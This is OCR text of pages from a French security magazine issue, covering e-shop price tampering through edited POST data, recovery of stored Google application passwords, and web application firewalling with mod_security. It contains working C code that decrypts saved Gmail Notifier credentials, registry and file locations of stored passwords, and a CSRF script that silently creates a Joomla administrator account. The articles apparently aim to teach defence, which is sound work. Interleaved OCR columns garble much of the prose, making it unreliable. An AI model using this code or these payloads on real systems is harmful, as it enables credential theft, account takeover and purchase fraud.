cloud computing. Personne n'a besoin poser des problèmes. Les géants les nuages de calculs bien protégés,
d'être convaincue que les serveurs d'Internet doivent déjà prendre en compte constituant des salles de serveurs
physiques sont utilisés davantage si de qu'ils ne peuvent pas offrir leurs services professionnellement gérées, permet de
nombreuses machines virtuelles y sont partout. Certains pays ne permettent pas réduire le risque de l'attaque sur les
situées. À l'instar d'autres entreprises et d'utiliser des outils cryptographiques ordinateurs à domicile ou les serveurs
des entreprises utilisant le nuage, cette par les utilisateurs civils et l'accès aux dans des petites entreprises. La raison
solution permet de réduire les coûts et documents érotiques ou la possibilité de est simple : très peu de logiciels s'y
trouveront et donc la protection sera à
charge des fournisseurs de services.
Virtualisation Le choix du client se limitera à choisir
La virtualisation consiste à séparer de manière logicielle ou matérielle la couche de ressources
des applications qui s'en servent. Une couche abstraire est ainsi créée et elle cache les ressources
une entreprise de confiance qui fournit
disponibles. Une solution populaire consiste à installer des systèmes d'exploitation virtuels. Un le service en question. Le mauvais choix
système installé de telle manière peut être enregistré et transmis sur un autre ordinateur équipé aura des conséquences tragiques car
des logiciels de virtualisation. Cette opération prend le temps nécessaire pour copier les la quantité de données transférée sur le
fichiers dans un nouvel emplacement. Un ordinateur physique peut contenir plusieurs systèmes nuage augmentera constamment.
d'exploitation virtuels.
Grâce à cette solution, tous ces ordinateurs peuvent fonctionner indépendamment avec une
seule application, ce qui permet par exemple, de protéger le système avec le serveur de messagerie
électroniqu, en cas d'attaque du système avec le serveur FTP. La virtualisation permet de mieux
Marcin Kosedowski
utiliser les ressources. De nombreux serveurs peu chargés peuvent se trouver sur une machine Journaliste publiant notamment dans les magazines
physique et si l'un d'entre eux a besoin de plus de ressources, il est possible de le transférer sur Internet Maker et PC World. Il s'intéresse à l'anonymat,
un autre ordinateur. Les disques durs, les applications et les processeurs peuvent également être aux spams et à la cryptographie. Actuellement, il
termine ses études à la faculté de l'Electronique et de la
virtualisés (aussi bien en les combinant en matrice RAID qu'en séparant les supports physiques). Télécommunication à l'Ecole Polytechnique de Wroclaw.

58 HAKIN9 03/2010

50_59____koswdowski.indd 58 2010-03-11, 14:43:46


50_59____koswdowski.indd 59 2010-03-11, 14:43:54
TECHNIQUE
Les failles de
AMAR PAUL

type Request
DATA
Degré de difficulté

Cet article porte sur les failles de type Request DATA, leurs dangers
face aux nouvelles applications Web et les moyens de prévention
mis en place par certaines plates-formes.

A
vec Internet, les e-boutiques fleurissent sur L'utilitaire le plus souvent utilisé est Tamper
le Web et proposent leurs services. Ces DATA. Il s'agit d'un add-on pour Mozilla Firefox qui
dernières ont parfois des problèmes de permet, entre autres, de visualiser et d'éditer les
sécurité faisant transiter des informations critiques Headers HTTP/HTTPS ainsi que les données en
comme, par exemple, le prix du produit souhaité POST et bien d'autres fonctionnalités que vous
dans le corps de la requête. découvrirez grâce au lien fourni en annexe ; cet
Un des risques potentiels serait que cette outil sera le petit couteau suisse des curieux !
brèche soit utilisée à des fins malhonnêtes, Cet utilitaire a permis de constater que les
notamment acheter de nombreux produits à des données envoyées aux serveurs cibles contiennent
prix qui n'ont rien à voir avec ceux indiqués sur les de nombreuses informations, dont le prix.
sites cibles. Dans notre cas, l'utilitaire Tamper DATA altère
La présente étude portera donc dans un ces données et les envoient ensuite, comme dans
premier temps sur les risques des failles de la procédure normale. Nous aurions très bien pu
type Request DATA, sur la façon de les détecter réaliser un utilitaire permettant de forger nos propres
et sur la manière dont un attaquant les utilise à requêtes POST avec les champs nécessaires et
son profit. les valeurs que nous voulions mais l'utilisation de
Dans un second temps, nous nous Tamper DATA nous semble être la plus efficace
intéresserons à une méthode pour pallier ce et la plus rapide à mettre en place. D'autres outils
problème et pour 'patcher' l'application Web existent, comme FireBug, permettant de modifier la
concernée. source de la page et changer certains attributs du
formulaire (voir Figures 1 et 2).
Utilisation à l'encontre des Sites Un schéma permettra de mieux comprendre
CET ARTICLE Web, E-boutiques et autres l'attaque.
EXPLIQUE
structures Web Nous allons maintenant nous intéresser à un
le principe des failles de type
Request DATA, leur utilisation à
Essayons d'apprendre à détecter la présence cas réel, à savoir une e-boutique.
l'encontre des e-boutiques, mais d'une telle faille dans notre application Web et Nous ne donnerons pas plus de détails car
aussi le moyen de sécuriser
son site web pour se prémunir voyons ainsi comment un pirate pourrait l'exploiter. notre but n'est pas de nuire à une entreprise mais
contre ces risques. Ce qu'il faut déjà comprendre, c'est qu'il existe d'introduire une nouvelle notion de vulnérabilité qui
deux types de requête HTTP : GET et POST. sévit sur la toile.
CE QU'IL FAUT
SAVOIR Malheureusement, les deux méthodes Comme toute e-boutique, différents menus
n'échappent pas à la vulnérabilité qui sera vous sont proposés avec un choix d'articles à
avoir des notions importantes en
PHP, SQL et (x)HTML. présentée ici. acheter et lorsque vous cliquez sur l'un d'eux, une

60 HAKIN9 3/2010

60_63___request.indd 60 2010-03-11, 13:22:03


LES FAILLES DE TYPE REQUEST DATA

fiche produit s'affiche, présentant ses d'une partie des données transférées en Contrairement aux problèmes qu'ont
différentes caractéristiques (la taille, la POST (voir Figure 3). rencontrés les sites Web avec leurs
disponibilité,...) ; mais ce qui nous intéresse Comme le montre la copie d'écran, le propres structures pour gérer leurs
ici est tout simplement le prix. prix est en clair dans la requête HTTP ; dès articles avec leurs prix ou toutes autres
Ce dernier est donc affiché et vous lors, nous le modifions à notre guise sans sortes d'attributs, d'autres méthodes sont
renseignez la quantité désirée. Ensuite, aucun problème. présentes sur la toile, comme recourir à
vous cliquez sur le bouton Ajouter au Cette brèche de sécurité permet des systèmes déjà conçus à cet effet, tels
panier qui enverra les données à un script à une personne mal intentionnée d'y Paypal.
lequel gèrera la mise dans le panier, bref écrire ce que bon lui semble, comme par De nombreuses E-boutiques font
un exemple commun à tous. exemple un prix à 0€ ; cela fonctionne appel à ces services pour réaliser
Commandons un article avec des sans problème. un système de paiement 'sécurisé'.
attributs aléatoires et décortiquons la Voici donc un exemple de cas avec le Malgré cela, leurs implémentations
requête POST. Voici la capture d'écran prix à 0€ (voir Figure 4). au niveau des plates-formes web
laissent quelques fois à désirer : elles
permettent tout autant à une personne
mal intentionnée de changer les prix de
différents articles.
Le principe est le même, ce dernier
altère la requête POST envoyée au
service Paypal, contenant les informations
cruciales comme le prix de l'article.
Une capture d'écran a été réalisée,
représentant la preuve du concept depuis
un cas précis. Malgré les sécurités
instaurées par Paypal, il est donc possible
d'altérer l'intégrité des données qui
transitent sur le réseau avant d'arriver
sur la page avec notre propre panier (voir
Figure 5).
Et voici le résultat sur le site PayPal
(voir Figure 6).
Nous avons montré comment il était
possible d'altérer des données plus que
Figure 1. Page principale de l'utilitaire Tamper DATA sensibles de E-boutiques malgré des
méthodes de paiement différentes. Nous

Figure 3. Interception des données


Traitement des données et envoi
du résultat au Pirate envoyées en POST.

Serveur cible

Envoi des données


falsifiées au serveur Pirate
Figure 4. Résultat sur une e-boutique
cible
« cible ».

Figure 5. Capture d'écran d'une requête


Figure 2. Principe de l'attaque de type Request DATA récupérée via Tamper DATA.

3/2010 HAKIN9 61

60_63___request.indd 61 2010-03-11, 13:22:10


TECHNIQUE
allons maintenant nous intéresser à la Chaque application devrait utiliser Nous allons utiliser une table Articles
façon de sécuriser notre application Web un tel système comparant les données pour notre base de données. Elle sera du
afin de prévenir ces dangers. récupérées de l'utilisateur à celles de type (cf. Listing 2).
la base de données (qui normalement, Dès lors, les champs indispensables
Prévention et sécurisation devraient être exactes). sont présents dont un ID unique nous
des sites Web, E-boutiques En représentant le formulaire permettant de trouver l'article et un certain
La brèche des failles de type Request schématiquement, le code serait quelque prix qui sera fixé, évitant ainsi tous les
DATA vient donc d'un problème de chose comme dans le Listing 1. problèmes.
programmation, de données mises dans Un champ de type Hidden (caché en Lorsque la fiche détaillée du produit
des formulaires et reprises ultérieurement anglais) est donc bien présent et permet sera affichée, nous pourrons donc
sans vérification de leur intégrité. ainsi de transférer des informations sans commander l'article avec un formulaire qui
Un test d'exploitation de cette faille que l'utilisateur lambda ne puisse les voir. serait du type (cf. Listing 3).
sur un site a donné ce message : Le prix D'un côté, cela paraît utile, rendant Vous l'aurez deviné, le problème est
que vous avez n'est pas celui que nous ainsi un formulaire moins difficile à le même qu'avant, mais il faudrait donc
avons dans notre base de données, vous comprendre pour les internautes. réaliser une vérification dans le script
avez donc le choix entre commander cet Toutefois, l'absence de vérification « commander.php » afin de savoir si le prix
article ou naviguer de nouveau dans le ultérieure risquerait de poser certains n'a pas changé (cf. Listing 4).
catalogue. problèmes. Nous ne sommes pas obligés
de mettre le prix dans un champ du
formulaire puisque dans notre requête
SQL, nous sélectionnerons tous
les attributs de l'objet souhaité par
l'utilisateur.
Nous aurions donc pu nous limiter à l'id
et la quantité par exemple mais l'explication
permet d'apprendre à sécuriser son
application web et non pas à la développer
entièrement.
D'autres systèmes sont présents sur
la toile, comme l'IPN (Instant payement
notification), service de Paypal.
Figure 6. Panier sous Paypal.
Cette notification instantanée nous
envoie des informations relatives à chaque
Listing 1. un système comparant les données récupérées de l’utilisateur à celles de
transaction faite sur notre site et compte
la base de données
PayPal.
<form action='cart.php' metod='POST'> Les informations que nous pouvons
<!-- Input etc... !-->
en retirer sont, par exemple, les
<input type='hidden' name='prix' value='13.00'>
<!-- Fin du formulaire !--> paiements en attente, les autorisations,
</form> les virements dif férés ou encore les
litiges.
Listing 2. Create table Article .
C'est cette dernière partie qui
Create table Article ( nous intéresse et qui nous assure une
Id auto_increment, certaine fiabilité au niveau des paiements
Prix INT NOT NULL,
rencontrés sur internet.
Categorie VARCHAR(100),
Nom VARCHAR(100), Dès lors, en constatant qu'un
Description TEXT, achat est fait avec des paramètres
Primary Key(Id) frauduleux, nous arrêtons directement la
);
transaction.
Listing 3. commande de l’article. Ce service nous permet de garder la
maîtrise de tout ce qui se passe et ainsi
<form action='commander.php' method='POST'>
avoir un système mieux sécurisé.
<input type='hidden' name='id' value='10'>
<input type='hidden' name='prix' value='20'> Malheureusement, seules peu
<input type='Submit' value='Buy!'> d'applications utilisent un tel service et de
</form> nombreuses autres restent vulnérables à
ce type d'attaque.

62 HAKIN9 3/2010

60_63___request.indd 62 2010-03-11, 13:22:29


LES FAILLES DE TYPE REQUEST DATA

Listing 4. le script « commander.php »

<?php
/*
inclusion du fichier de configuration avec les identifiants pour votre base de données.
*/
if (isset($_POST['id']) && $_POST['id']!='' && isset($_POST['prix']) && $_POST['prix']!='') {
$id = htmlspecialchars(mysql_real_escape_string($_POST['id']));
$prix=htmlspecialchars(mysql_real_escape_string($_POST['prix']));
/*
Nous avons donc utilisé htmlspecialchars(); pour éviter les risques de failles XSS (soit Cross Site Scripting) et mysql_
real_escape_string(); pour éviter les risques d'injection SQL.
En poussant plus loin, il aurait fallu faire la même chose pour éviter
les risques de failles CSRF, mais pour cela, nous vous renvoyons à l'article paru
dans le magazine de Mai-Juin.
*/
$sql = "select * from Articles where id = '".$id."';";
/*
Réalisons une requête en recherchant toutes les informations de notre article correspondant à $id.
*/
$resultat = mysql_query($sql) or die("Problème au niveau de la requête !");
$ligne=mysql_fetch_array($resultat);
if ($prix==$ligne[1])
{
/*
traitement des données et si tout se passe bien, l'article est mis dans le panier.
Nous avons fait une comparaison du prix donné dans le formulaire en type Hidden et celui de la base de données. Nous
aurions pu ne pas mettre celui dans le formulaire mais nous contenter juste de récupérer celui de la
base de données qui aurait correspondu à l'id souhaité, unique pour chaque produit.
*/
}else{
/*
Le prix de la base de données diffère de celui du formulaire. Dans ce cas, il s'agit peut-être d'une tentative de faille Request
DATA, il faudrait donc afficher un message d'erreur qui en expliquerait les raisons.
*/
}
?>

Conclusion d'attaques. Nous vous conseillons donc Forgeries (CSRF) ou les Injections SQL
Nous vous avons montré à quel point de vérifier vos propres applications et font d'énormes dégâts. Pour cela, dans le
il est facile d'altérer les requêtes HTTP lors d'un projet, d'envisager toutes les code source, il faut « sécuriser » toutes les
afin de les tourner à l'avantage de possibilités susceptibles d'entraver le bon données provenant de l'internaute. Utiliser
l'attaquant. Aucune des méthodes (GET fonctionnement du Site Web en réalisant des fonctions comme htmlspecialchars()
ou POST) n'est épargnée mais grâce à des diagrammes de cas d'utilisation, de et mysql_real_escape_string() sont
une bonne rigueur de programmation, séquences etc. obligatoires au bon fonctionnement du
nous pouvons protéger notre propre En outre, ces vulnérabilités ne sont pas projet.
application contre cela. Malheureusement, les seules qui touchent les applications
au moment où sont écrites ces lignes, Web spécialisées dans le commerce
de nombreuses E-boutiques et plates- (ou autre). Les attaques de type Cross
formes Web sont vulnérables à ce genre Site Scripting (XSS), Cross site Request

À propos de l'auteur
Sur Internet L'auteur est actuellement en DUT informatique à
Fontainebleau. Il se passionne pour la sécurité
informatique depuis plusieurs années. Depuis peu, il
• https://addons.mozilla.org/en-US/firefox/addon/966 – Lien vers l'add-on Tamper DATA (utilisé à s'intéresse à la sécurité des systèmes d'information
l'appui de cet article) afin de comprendre les risques éventuels et les moyens
permettant de les pallier. Il envisage de préparer
• https://addons.mozilla.org/fr/firefox/addon/1843 – Lien vers l'add-on FireBug (utile pour un diplôme d'ingénieur en informatique. Après de
éditer des codes source en direct) nombreuses recherches sur les failles de type Cross
• http://shiflett.org/articles/sql-injection – Article de Chris Shiflett très intéressant sur les Site Request Forgeries (CSRF, article publié au mois de
Mai-Juin), il s'est frotté à d'autres problèmes permettant
Injections SQL.
de manipuler les requêtes HTTP. Le principe des failles
• https://www.paypal.com/ipn - Information sur le service IPN offert par PayPal permettant de type Request DATA est simple à comprendre : une
d'avoir toutes les traces etc. concernant ses transactions. requête est envoyée à un serveur distant et il suffit de
l'altérer pour produire un état précis sur le serveur cible.

3/2010 HAKIN9 63

60_63___request.indd 63 2010-03-11, 13:22:41


TECHNIQUE
ALEXANDRE LACAN

Comment
récupérer les mots
de passe des
applications Google
Degré de difficulté
Cet article s'intéresse au stockage des mots de passe des
applications Google sur un ordinateur. Il ne s'intéresse pas à la
récupération des mots de passe par ingénierie sociale, ou par des
techniques de type Man-in-the-Middle. Pour l'ensemble des détails
décrits ci-après, nous supposons disposer d'un accès complet à
la machine.

N
agareshwar Talekar (http://twitter.com/ si un utilisateur coche la case remember
tnagareshwar) est un chercheur en password, une clé est créée dans la base de
sécurité spécialisé en ingénierie inverse. registre à l'emplacement :
Il vient de publier plusieurs articles relatifs au
déchiffrement des mots de passe des applications HKEY_CURRENT_USER\Software\Google\Google
Google, dont cet article s'est inspiré. Il a mis en Talk\Accounts
ligne les logiciels GooglePasswordDecryptor et
ChromePasswordDecryptor permettant d'auto- Le nom de la clé correspond au nom d'utilisateur
matiser la récupération et le déchiffrement de ces et le mot de passe est stocké dans la valeur
mots de passe. pw. Le logiciel chiffre le mot de passe Google
en utilisant les fonctions cryptographiques de
Google Talk Windows (http://msdn.microsoft.com/en-us/
Google Talk est une application de messagerie librar y/aa380252%28VS . 85%29.aspx #data_
instantanée (cf. Figure 1). Lors de l'authentification, encryption_and_decryption_functions). Pour

CET ARTICLE
EXPLIQUE...
où sont stockés les mots de
passe des applications Google,

comment les déchiffrer.

CE QU'IL FAUT
SAVOIR...
notions de développement. Figure 1. Stockage des identifiants Google Talk dans la base de registre

64 HAKIN9 3/2010

64_67____google.indd 64 2010-03-10, 16:36:13


RÉCUPÉRATION DE MOTS DE PASSE

déchiffrer le mot de passe, procédez fondant sur la version d'Internet Explorer • Pour chaque entrée découverte,
comme suit : installée. déchiffrer le mot de passe grâce à la
Si l'ordinateur utilise une version fonction CryptUnprotectData.
• récupérez le nom d'utilisateur et d'Internet Explorer 6 ou moins récente, le
le nom du domaine utilisé pour la mot de passe est protégé par Protected Google Desktop Search
session Windows courante, Storage (http://msdn.microsoft.com/en- Desktop Search permet d'indexer le
• grâce aux fonctions cryptographiques us/library/bb432403%28VS.85%29.aspx). contenu d'un disque dur pour rendre la
de Windows, créez le hash du nom Un logiciel comme Cain (http://www.oxid.it) recherche d'un élément plus rapide. En
d'utilisateur et celui du nom de permet de récupérer aisément le mot de y attachant un compte Gmail, la recherche
domaine, passe en clair. dans le contenu des mails est plus
• la valeur sur 16 octets obtenue est Si l'ordinateur utilise Internet Explorer rapide. Ce petit logiciel permet d'avertir
ensuite utilisée pour obtenir un hash 7 ou plus récent, le mot de passe est un utilisateur de l'arrivée de ses mails.
du mot de passe chiffré, alors stocké de manière sécurisée en Gmail Notifier utilise différentes méthodes
• enfin, le mot de passe est déchiffré utilisant Windows Credential Provider. Pour pour sécuriser les mots de passe, en se
grâce à la fonction CryptUnprotect- récupérer le mot de passe, il faut : fondant sur la version d'Internet Explorer
Data. installée. Les comptes configurés sont
• utiliser la fonction CredEnumerate stockés à l'emplacement suivant :
Picasa pour lister les mots de passe protéger
Picasa est un logiciel de classement et par Windows Credential Provider, HKEY_CURRENT_USER\Software\Google\
de retouche photo. Google propose en • sélectionner l'entrée associée au Google Desktop\
parallèle un service de stockage gratuit compte google en vérifiant si la valeur Mailboxes\Gmail
sur Internet pour le partage de photos. Les TargetName commence par le texte
identifiants Picasa Web enregistrés sur : Microsoft_WinInet_www.google.com: La clé POP3_Name contient le nom
l'ordinateur sont stockés dans la base 443, du compte, et la clé POP3_Credentials
de registre à l'emplacement suivant :

HKEY_CURRENT_USER\Software\Google\ Sur le réseau


Picasa\Picasa2\ • http://securityxploded.com – articles de Nagareshwar Talekar sur le déchiffrement des mots
Preferences de passe Google,
• http://msdn.microsoft.com/en-us/library/aa380252%28VS.85%29.aspx#data_encryption_
Le nom d'utilisateur est stocké dans la and_decryption_functions – les fonctions cryptographiques de Windows,
valeur GaiaUser et le mot de passe est
chiffré et stocké dans la valeur GaiaPass.
Comme Google Talk, le mot de passe
est protégé par l'utilisation des fonctions
cryptographiques de Windows. Pour
retrouver en clair le mot de passe, il
faut :

• convertir le nom d'utilisateur en gaia:


:<username> (par exemple gaia::
lades51),
l• e mot de passe chiffré est décodé au
format hexadécimal,
• utiliser la fonction CryptDeriveKey en Figure 2. Déchiffrement de Protected Storage par Cain
utilisant le nom de compte modifié
comme mot de passe,
• déchiffrer le mot de passe en utilisant
la fonction CryptDecrypt .

Gmail Notifier
Ce petit logiciel permet d'avertir un
utilisateur de l'arrivée de mails sont.
Gmail Notifier utilise différentes méthodes
pour sécuriser les mots de passe, en se Figure 3. Chrome - Contenu de la table logins avec SQLite Database Browser

3/2010 HAKIN9 65

64_67____google.indd 65 2010-03-10, 16:36:21


TECHNIQUE
contient le mot de passe chiffré. Une fois CryptUnprotectData qui permet de Google Chrome
de plus, c'est l'utilisation de la fonction récupérer le mot de passe en clair. Comme tous les navigateurs, Chrome
dispose d'une fonction permettant de
conserver les identifiants des sites visités.
Listing 1. Déchiffrement de mots de passe protégés par Windows Credential Pour les ordinateurs sous XP, cette base
Provider
de données est stockée à l'emplacement
Credits : Thanks to SapporoWorks for original work suivant :

void DecryptGmailNotifierPassword()
C:\Documents and Settings\<username>\
{
DATA_BLOB DataIn; Local Settings\
DATA_BLOB DataOut; Application Data\
DATA_BLOB OptionalEntropy; Google\Chrome\
tmpSalt[37];
char *strSalt={"abe2869f-9b47-4cd9-a358-c22904dba7f7"};
User Data\Default

char strURL[1024]; Si l'ordinateur est équipé de Vista ou


char strCredentials[1024];
supérieur, l'emplacement de stockage est :
char strUsername[1024];
char strPassword[1024];
C:\Users\<username>\Appdata\Local\
//Create the entropy/salt required for decryption... Google\Chrome\
for(int i=0; i< 37; i++)
User Data\Default
tmpSalt[i] = (short int)(strSalt[i] * 4);

OptionalEntropy.pbData = (BYTE *)&tmpSalt; Ce répertoire contient plusieurs fichiers


OptionalEntropy.cbData = 74;
contenant les favoris, l'historique, le cache,
DWORD Count;
… Le fichier Web Data est celui qui contient
PCREDENTIAL *Credential; les mots de passe, mais également
les autres informations nécessaires à
//Now enumerate all http stored credentials....
l'autocomplétion, dans la table 'logins' :
if(CredEnumerate(NULL,0,&Count,&Credential))
{
for(int i=0;i<Count;i++) • origin_URL : URL du site web,
{ • action_URL : URL du formulaire d'authe-
if( (Credential[i]->Type == 1) &&
_strnicmp(Credential[i]->TargetName, "Microsoft_WinInet_www.google.com",
tification,
strlen("Microsoft_WinInet_www.google.com")) == 0 ) • username_Element : Nom du champ
{ username,
DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob;
• username_value : Nom d'utilisateur,
DataIn.cbData = Credential[i]->CredentialBlobSize;
• password_element : Nom du champ
if(CryptUnprotectData(&DataIn, NULL, &OptionalEntropy, contenant le mot de passe,
NULL,NULL,0,&DataOut)) • password_value : mot de passe chiffré,
{
• date_created : Date de la création de
//Extract username & password from credentails (username:password)
sprintf_s(strCredentials, 1024, "%S", DataOut.pbData); cette entrée,
• blacklisted_by_user : champ contenant
char *ptr = strchr(strCredentials, ':'); 1 ou 0 si le site a été mis en liste noire
*ptr = '\0';
strcpy_s(strUsername, 1024, strCredentials);
ou non.
ptr++;
strcpy_s(strPassword, 1024, ptr); Le mot de passe est chiffré en 3DES, grâce
aux informations d'authentification de
printf("Gmail Notifier Stored account details are, Username=%s,
Password=%s", strUsername, strPassword); l'utilisateur Windows en cours. Ainsi, seul cet
utilisateur peut déchiffrer le mot de passe,
} grâce à la fonction CryptUnprotectData.
}
} // End of FOR loop

CredFree(Credential);
}

} //End of function À propos de l'auteur


Auteur : Alexandre LACAN
Pour le contacter : alexandre.lacan@gmail.com
http://twitter.com/lades51

66 HAKIN9 3/2010

64_67____google.indd 66 2010-03-10, 16:36:29


64_67____google.indd 67 2010-03-10, 16:36:41
SÉCURITÉ RÉSEAUX
Sécuriser les
TONY FACHAUX

applications
Degré de difficulté
web
L'article présente d'une manière générale les moyens techniques
à mettre en œuvre pour sécuriser les applications web d'une
entreprise. Cette sécurisation passe par la mise en place d'un
WAF (Web Application Firewall). Dans cet article, nous utiliserons
le mod_security d'Apache pour expliquer la mise en œuvre de ce
type de protection.

A
ujourd'hui, les attaques sont de moins en C’est pour cela que des équipements, appelés
moins réalisées sur les serveurs ou sur WAF (Web Application Firewall ou Firewall applicatif
les réseaux car ils sont de mieux en mieux en français), font leur apparition et sont maintenant
protégés. La majeure partie des vulnérabilités se un maillon indispensable dans la sécurité d’une
trouvent dans les applications et les applications architecture. Pour répondre à ce besoin, il existe
Web sont aujourd’hui extrêmement répandues. une multitude d’appliances sur le marché telles

Flux HTTP/HTTPS

DMZ Web DMZ Publique

CET ARTICLE Flux HTTP


EXPLIQUE...
Ce qu'est un WAF (Web
Application Firewall).

Comment filtrer les attaques


Web.
Serveur Web WAF (Web
CE QU'IL FAUT AQpplication
Firewall)
SAVOIR...
Quelques notions sur le
protocole HTTP. Figure 1. Architecture Web sécurisée par un WAF

68 HAKIN9 3/2010

68_73_____securiteWEB_ok.indd 68 2010-03-10, 16:41:39


SÉCURISER LES APPLICATIONS WEB

Deny All, F5 ou encore Barracuda. Mais


nous parlerons ici de mod_security2 La configuration du reverse proxy
qui est un module de filtrage applicatif La configuration du reverse proxy est contenue dans le fichier httpd.conf de notre Apache situé
en frontal derrière le firewall. Il faut d’abord vérifier que les modules sont correctement chargés :
pouvant être couplé avec un Apache
configuré en reverse proxy. Tout ceci est • LoadModule proxy_module modules/mod_proxy.so
plus communément appelé un reverse • LoadModule proxy_http_module modules/mod_proxy_http.so
proxy filtrant. • LoadModule proxy_connect_module modules/mod_proxy_connect.so

Ensuite, il faut réaliser la configuration du reverse proxy :


Qu'est ce qu'un reverse
proxy • ProxyRequests Off
Il convient ici de définir ce qu’est un • ServerName IP_de_la_web_application
reverse proxy. Comme son nom l’indique, • ProxyPass / http://IP_de_la_web_application
• ProxyPassReverse / http://IP_de_la_web_application
un reverse proxy est le contraire d’un
proxy ! Le reverse proxy se place en frontal Nous avons réalisé une configuration basique du reverse proxy. Il est aussi évident ici que dans
derrière le firewall. Derrière lui, se cache un cas réel, nous configurerions une authentification mais ce n’est pas le but de cet article. La
un ou plusieurs serveur web. Le reverse documentation officielle de mod_proxy est très bien faite à ce sujet.
proxy peut faire de la répartition de charge
et/ou du filtrage ce que nous allons voir ici
en pratique.
Le filtrage se réalise de deux
manières : soit par liste blanche, soit par
liste noire. La liste blanche est la plus
sûre mais la plus difficile à configurer.
Son but consiste à tout bloquer et à
n’autoriser que le trafic sûr (typiquement
le fonctionnement d’un pare-feu réseau).
Une tâche difficile pour des applications
qui génèrent beaucoup de données Figure 2. Trace générée par mod_security2
aléatoires. La quasi-impossibilité de
connaître tout le bon trafic est un
autre élément de difficulté. Une liste
blanche mal générée risque d'altérer le
fonctionnement de l’application. Dans
certains cas, nous sommes donc obligés
d'opter pour la liste noire qui consiste à
bloquer tout le mauvais trafic. Mais qui
peut prétendre connaître tout le mauvais
trafic de l’Internet ? Personne ! C’est donc
pour cette raison que la liste blanche est
plus sûre bien que pas toujours évidente
à implémenter.

L'architecture
Figure 3. Fichier de configuration de mod_security2
La figure 1 représente un schéma
basique d'une architecture web protégée
par un WAF.
Les clients sur Internet interrogent
le reverse proxy en HTTP ou en HTTPS
selon l'application. Le reverse proxy filtrant
analyse les requêtes web, les autorise ou
non et redirige les requêtes en HTTP au
serveur web correspondant. Le reverse
proxy est généralement placé dans une
DMZ publique car elle est joignable depuis
l'extérieur et les serveurs web sont, quant Figure 4. News déposée sur Joomla

3/2010 HAKIN9 69

68_73_____securiteWEB_ok.indd 69 2010-03-10, 16:41:46


SÉCURITÉ RÉSEAUX
à eux, placés dans une DMZ spécifique. HTTP ou en HTTPS, le reverse proxy se partons du principe qu'il dispose de la
L’application web que nous utiliserons en chargera ensuite de relayer les requêtes configuration suivante : un OS FreeBSD
appui du présent article sera un Joomla vers Joomla en HTTP. avec Apache 2.2, PHP5 et MySQL. Le
1.0.13 STABLE. Cette application n’est reverse proxy dispose du mod_proxy
volontairement pas la dernière version afin Configuration de l'architecture d'Apache pour fonctionner en reverse
de tester aisément l’exploitation de failles L'architecture se compose des éléments proxy et le serveur web hébergera
dans l’application. suivants : l'application Joomla.
Expliquons rapidement le principe de
fonctionnement. Un utilisateur sur Internet • Un serveur web hébergeant l'application Le mod_security
désirant se connecter sur Joomla entre web Joomla Mod_security est un module d’Apache
dans son navigateur Internet l’adresse • Un reverse proxy filtrant permettant de transformer un Apache
du reverse proxy (rappelez-vous qu’il est configuré en reverse proxy en firewall
placé en frontal). Son navigateur affichera Nous ne détaillerons pas complètement applicatif. Il faut savoir que mod_security
alors Joomla. L’utilisateur se connecte en l'installation de ces serveurs mais dispose d’une communauté très active et
commence à être de plus en répandu.
Listing 1. Un exemple d'attaque CSRF La grande force de mod_security est
de pouvoir filtrer à 5 niveaux :
Je vais gagner
<script type="text/javascript">
window.onload = function() { • En-têtes de requêtes
var url = "http://IP_Joomla/joomla/administrator/index2.php"; • Corps des requêtes
var gid = 25; • En-têtes de réponses
var user = 'mechant';
var pass = 'mechant';
• Corps des réponses
var email = 'mechant@toto.com'; • Journalisation
var param = {
name: user,
Cela fait de mod_security un outil de filtrage
username: user,
email: email, très puissant pour les applications web.
password: pass,
password2: pass, Installation
gid: gid,
L'installation de mod_security sous
block: 0,
option: 'com_users', FreeBSD se fait simplement:
task: 'save',
sendEmail: 1 cd /usr/ports/www/mod_security2 &&
};
make install
var form = document.createElement('form'); clean
form.action = url;
form.method = 'post';
Passons maintenant à la préparation de la
form.target = 'hidden';
form.style.display = 'none'; configuration
Comme pour le reverse proxy, nous
for (var i in param) { devons vérifier que les modules sont
try {
correctement chargés dans Apache.
// ie
var input = document.createElement('<input name="'+i+'">'); Le module mod_unique permet à
} catch(e) { mod_security d’identifier de manière
// other browsers
unique chaque requête reçue :
var input = document.createElement('input');
input.name = i; LoadModule unique_id_module libexec/
} apache22/mod_
unique_id.so
input.setAttribute('value', param[i]);
form.appendChild(input);
} Chargement du module mod_security2 :

document.body.appendChild(form);
LoadModule security2_module libexec/
form.submit();
} apache22/mod_
</script> security2.so
<iframe name="hidden" style="display: none"></iframe>

Configuration de mod_security2 :

70 HAKIN9 3/2010

68_73_____securiteWEB_ok.indd 70 2010-03-10, 16:41:54


SÉCURISER LES APPLICATIONS WEB

Include etc/apache22/Includes/*.conf Paramétrage personnalisé sur le site officiel de mod_security. Une


Avant tout, il convient d’expliquer comment multitude de règles peuvent être écrites.
Tous les fichiers de configuration de personnaliser la configuration de mod_ Vous trouverez plus loin dans cet article les
mod_security se trouvent dans /usr/ security manuellement. Pour cela, il faut règles que nous avons éditées pour bloquer
local/etc/apache22/Includes/mod _ ajouter un fichier .conf au répertoire de notre attaque. En voici quelques-unes :
security2 (cf. Figure 2). mod_security. Ce fichier .conf sera pris en Bloquer l’accès au répertoire joomla
Le fichier de configuration principal compte puisque nous lui avons indiqué : dans une url :
est modsecurity_crs_10_config.conf. Les
autres fichiers représentent les règles Include etc/apache22/Include/*.conf SecFilter /joomla/
ModSecurity Core Rules qui fonctionnent
en liste noire et qui représentent une Afin d’éditer des règles, il faut utiliser la Interdire la méthode TRACE :
protection de base intéressante contre une directive SecRule avec cette syntaxe :
quantité d’attaques connues. SecFilterSelective REQUEST_METHOD «
SecRule Variables Opérateur [Actions] TRACE »
Paramétrage de mod_
security2 Pour avoir la documentation complète Vous trouverez plusieurs exemples de
Voici le détail du paramétrage du fichier de des paramètres utilisables, rendez-vous règles dans l’article d’HSC qui se trouve
configuration principal de mod_security :
SecRuleEngine On : Activation du
module mod_security. Ce module intercepte
les requêtes et les bloque ou laisse passer
selon la configuration. Cette option peut
être bloquée ou simplement active sans
blocage (active à des fins de logs).
SecRequestBodyAccess On : les règles
qui inspectent le corps des requêtes sont
actives.
SecResponseBodyAccess On : les règles
qui inspectent le corps des réponses sont
actives.
SecDefaultAction : Détermine l’action par
défaut lorsqu’aucune règle ne s’applique.
Plusieurs options peuvent y être spécifiées
comme log pour loguer, deny pour arrêter
l’application, etc. Une grande particularité de
mod_security est qu’il log beaucoup plus
